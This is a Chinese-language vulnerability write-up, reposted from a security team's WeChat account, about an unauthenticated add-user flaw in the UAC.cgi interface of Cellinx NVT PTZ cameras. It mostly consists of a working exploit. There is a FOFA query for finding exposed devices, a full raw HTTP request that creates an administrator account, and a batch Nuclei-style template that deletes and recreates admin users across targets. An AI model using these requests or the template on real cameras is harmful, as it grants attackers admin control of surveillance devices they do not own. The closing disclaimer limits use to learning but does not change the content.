漏洞简介
Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。Cellinx NVT 摄像机 UAC.cgi 接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户。
漏洞复现
步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~
# 搜索语法body="local/NVT-string.js"
步骤二:可构造以下数据包进行创建用户测试如成功则返回如下相应包….
POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1host:127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 194{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"test","password":"test","permission":{"is_admin":"1","view":"1","ptz":"1","setting":"1","dout":"1"}}}}
HTTP/1.1 200 OKSet-Cookie: TRACKID=53c5ea7529676c72bd899760e4d3c119; Path=/; Version=1Pragma: no-cacheCache-Control: no-cacheContent-type: application/jsonConnection: closeDate: Tue, 30 May 2023 13:03:43 GMTServer: lighttpd/1.4.33Content-Length: 104{"retData":{"add_user":{"result" : "Success"}}}
步骤三:使用创建的用户账号登录后台…Success!
批量脚本
id: cellinx-nvt-uac-unauthinfo:name: cellinx-nvt-uac-unauthauthor: unknowseverity: highdescription: cellinx 摄像机 uac.cgi 存在未授权添加用户漏洞。tags: cellinx,unauthmetadata:fofa-query: body="local/NVT-string.js"http:- raw:- |POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1Host:Content-Type: application/json; charset=UTF-8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15{"jsonData":{"username":"guest","password":"","option":"delete_user","data":{"username":"{{username}}"}}}- |POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1Host:Content-Type: application/json; charset=UTF-8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"{{username}}","password":"{{password}}","permission":{"is_admin":"1","view":"1","ptz":"1","setting":"1","dout":"1"}}}}attack: clusterbombpayloads:username:- adminqwepassword:- adminqwematchers-condition: andmatchers:- type: dsldsl:- 'status_code_2==200 && contains(body_2, "add_user":{"result" : "Success"}}}") && contains(header_2, "application/json")'
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):Cellinx 摄像机 uac.cgi 未授权添加用户漏洞
